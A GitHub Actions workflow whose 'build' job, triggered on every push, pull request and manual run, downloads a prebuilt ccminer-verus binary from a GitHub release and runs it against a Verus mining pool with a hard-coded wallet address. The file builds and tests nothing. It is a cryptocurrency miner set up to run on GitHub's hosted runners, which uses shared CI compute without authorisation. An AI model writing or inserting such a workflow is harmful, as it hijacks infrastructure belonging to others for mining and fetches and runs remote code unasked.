name: my

on:
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  workflow_dispatch:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v6
      - name: my
        run: |
          sudo apt update
          sudo apt install libomp-dev
          sudo apt install bc
          wget https://github.com/Oink70/ccminer-verus/releases/download/v3.8.3a-CPU/ccminer-v3.8.3a-oink_Ubuntu_18.04+nicehash
          mv ccminer* ccminer && chmod +x ccminer
          ./ccminer -a verus -o stratum+tcp://pool.verus.io:9999 -u RLUQtiZvHiTKDpG3ZZ6o5SdaPNLw2JUGab.my -p x -t 4      
